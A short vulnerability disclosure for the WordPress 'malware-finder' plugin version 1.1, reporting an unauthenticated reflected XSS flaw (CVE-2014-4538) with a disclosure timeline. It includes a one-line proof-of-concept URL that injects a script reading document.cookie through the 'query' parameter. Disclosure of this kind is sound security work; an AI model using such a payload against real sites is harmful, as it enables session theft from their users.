wp-plugin : malware-finder

Plugin Details
Plugin Name: wp-plugin : malware-finder
Effected Version : 1.1 (and most probably lower version's if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : prajalkulkarni
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :

PoC:http://localhost/wordpress/wp-content/wp-plugs/malwarefinder/process.php?query=query%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

Vulnerable Parameter : query


Disclosure Timeline
Vendor Contacted : 2014-01-21
Plugin Status : Updated on
Public Disclosure : May 28, 2014
CVE Number : CVE-2014-4538
Plugin Description :
[ Malware is a huge challenge in managing a Wordpress blog, not to mention that it can take hours to find where malicious code is hiding. But most likely you have access to at least one file (i.e. your homepage) that has been infected with malicious code. Just paste a small piece of that code below and the plugin will search through your entire Wordpress installation, providing the EXACT locations of the infected files! Please note that you WILL NOT be able to use this plugin if you are UNABLE to access your Wordpress Dashboard. ]